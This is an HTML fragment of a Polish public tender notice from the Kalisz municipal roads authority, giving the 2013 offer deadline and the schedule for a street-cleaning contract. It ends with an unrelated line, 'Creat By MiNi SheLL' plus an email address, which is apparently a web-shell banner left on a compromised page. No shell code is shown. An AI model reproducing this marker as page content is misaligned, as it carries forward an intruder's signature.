<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2013 godzina 12:00, miejsce: Zarząd Dróg Miejskich ul. Złota 43, 62-800 Kalisz - SEKRETARIAT pokój nr 201 mieszczący się na I piętrze budynku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zgodnie z treścią Siwz pkt.5:
5.	Termin wykonania zamówienia: 
5.1.  Przedmiot zamówienia realizowany będzie następująco:
    1/ rozpoczęcie realizacji usługi od dnia 15.03.2013 r.
    2/ zakończenie do dnia 15.11.2013 r., z tym, że usługa, o której mowa w pkt. 4.8.2. 
        realizowana będzie doraźnie na zlecenie Zamawiającego przekazywane w formie 
        pisemnej, określające zakres i częstotliwość oczyszczania. 
5.2. Zamawiający zastrzega sobie prawo przesunięcia terminu rozpoczęcia i zakończenia 
       realizacji przedmiotowego zamówienia, o którym mowa w pkt. 5.1.z uwagi na warunki 
       atmosferyczne..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com